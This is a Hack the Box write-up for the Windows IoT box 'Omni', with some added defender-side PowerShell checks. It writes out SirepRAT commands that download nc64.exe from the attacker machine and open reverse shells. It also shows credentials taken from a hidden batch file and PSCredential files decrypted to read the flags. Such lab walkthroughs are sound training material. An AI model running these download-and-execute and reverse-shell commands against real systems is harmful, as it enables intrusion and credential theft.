Hack the Box — Omni

Phenomenal
4 min read · Jan 8, 2021

Let's start by scanning the host.

nmap -sV -sC -Pn 10.10.10.204

Microsoft Windows RPC is the protocol that lets a client call procedures on a remote server as if they were local, so the two sides communicate transparently.

Microsoft IIS httpd

IIS is a flexible, general-purpose web server from Microsoft that runs on Windows systems and serves the HTML pages or files that clients request.

Let's look at the webpage.

I did a Google search for 'Windows Device Portal':

https://docs.microsoft.com/en-us/windows/iot-core/manage-your-device/deviceportal

The default credentials are not working.

Since this box runs Windows IoT, I googled for Windows IoT vulnerabilities and found a link about one (below).

First, clone the SirepRAT repository from GitHub:

https://github.com/SafeBreach-Labs/SirepRAT

Second, download the Windows Netcat binary (64-bit).

Extract it and move nc64.exe to the root directory.

Start a SimpleHTTPServer in the same directory.

Go into the SirepRAT directory and run:

$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://tun0/nc64.exe" -v

The Command was successful.

Now get your Netcat listener ready.

$ nc -nlvp 4545

Now let’s execute Netcat on the box.

$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe tun0 4545 -e powershell.exe" -v

AND WE GOT OUR SHELL !!!
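The steps above only work because C:\Windows\System32\spool\drivers\color is writable by standard users on Windows, which is why it is a common drop location. As an added defender-side check (not part of the original post, and not SirepRAT or Netcat code), this PowerShell snippet shows who holds write rights on that folder and lists any executables or scripts sitting in it; the folder path is the one used in the write-up, and the set of "legitimate" extensions is an assumption based on the colour-profile files Windows normally keeps there.

```powershell
# Added defender-side check (not from the original post). Lists write-capable
# ACEs on the colour-profile folder and flags executable content in it.
$dir = 'C:\Windows\System32\spool\drivers\color'

# Access-control entries that grant write, modify or full control.
# On a default install this includes Authenticated Users / BUILTIN\Users,
# which is what makes the folder usable as a drop point.
(Get-Acl -Path $dir).Access |
    Where-Object { $_.FileSystemRights -match 'Write|Modify|FullControl' } |
    Select-Object IdentityReference, FileSystemRights, AccessControlType |
    Format-Table -AutoSize

# Legitimate content is colour profiles (*.icm, *.icc, *.cdmp, ...).
# Executables or scripts here are worth investigating (assumption: the
# extension list below covers what an attacker is most likely to stage).
$suspect = '.exe', '.dll', '.ps1', '.bat', '.cmd', '.vbs'
Get-ChildItem -Path $dir -File -Force |
    Where-Object { $_.Extension.ToLower() -in $suspect } |
    Select-Object Name, Length, CreationTime, LastWriteTime |
    Format-Table -AutoSize
```

The same two checks apply to any other world-writable system path; a file-creation alert on this folder for .exe/.dll names is a cheap detection for the technique the write-up uses.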

We can't use whoami, so a friend suggested using $env:UserName to find the username.

Now let's enumerate further.

Here I learned about dir -Force, which lists hidden files in a directory.

I checked r.bat, which I found using dir -Force, and got two usernames and passwords.

Remember the webpage we found on port 8080? We can use these credentials there.

First I used "app", and I got a new webpage.

Under the Processes tab of that page I found a Run Command feature that runs any command, so I tried getting a reverse shell.

I started my Netcat listener again on a different port and then used the command below:

C:\Windows\System32\spool\drivers\color\nc64.exe tun0 5555 -e powershell.exe

GOT A SHELL!!!!

Let's check the username with the earlier command.

After enumerating further I found user.txt, but its content is encrypted.

Notice PSCredential!

BEFORE GOING FURTHER, GOOGLE PSCredential:

https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx

I learned what PSCredentials are and how to recover the decrypted password from one.

I used two commands:

1.) $credential = Import-CliXml -Path U:\Users\app\user.txt

2.) $credential.GetNetworkCredential().Password
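Why those two commands work, as an added example that is not from the original post: Export-CliXml stores the password of a PSCredential as a SecureString encrypted with DPAPI, scoped to the user and machine that wrote it. The file is therefore unreadable to other accounts, but any code running as that same user on that same host, such as the shell obtained above, can rebuild the credential and call GetNetworkCredential() to get the plaintext. The file path, account name and password below are constructed sample values.

```powershell
# Added example (not from the original post). Shows the round trip that the
# write-up performs on user.txt and what the on-disk protection amounts to.
$path = Join-Path $env:TEMP 'demo-cred.xml'   # assumed scratch location

# Build a credential from a constructed sample password (not a real secret).
$plain = ConvertTo-SecureString 'Sample-Passw0rd!' -AsPlainText -Force
$cred  = New-Object System.Management.Automation.PSCredential ('svc-demo', $plain)

# Export-CliXml serialises the SecureString as a DPAPI blob bound to the
# current user on the current machine; the XML holds a long hex string, not
# the plaintext.
$cred | Export-CliXml -Path $path
Select-String -Path $path -Pattern '<SS N="Password">' | ForEach-Object {
    $line = $_.Line.Trim()
    $line.Substring(0, [Math]::Min(60, $line.Length)) + '...'
}

# Same user, same host: Import-CliXml decrypts the blob back into a
# PSCredential and GetNetworkCredential() exposes the password. This is the
# step the write-up uses on U:\Users\app\user.txt.
$back = Import-CliXml -Path $path
$back.UserName                          # svc-demo
$back.GetNetworkCredential().Password   # Sample-Passw0rd!

# A different user, or the same user on another machine, lacks the DPAPI key:
# Import-CliXml then typically fails with "Key not valid for use in specified
# state". The file is exactly as safe as the account that wrote it.
Remove-Item -Path $path
```

The practical lesson for a defender is that a CliXml credential file left in a user's profile is a plaintext credential for anyone who obtains code execution as that user; it should not be treated as an at-rest protection against a compromised session.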

I GOT THE USER FLAG!!!

ROOT

Remember the two usernames we got from r.bat? Now use the second one, "administrator", to get the root flag.

TIP

For root follow the same steps that I used to get the user flag.
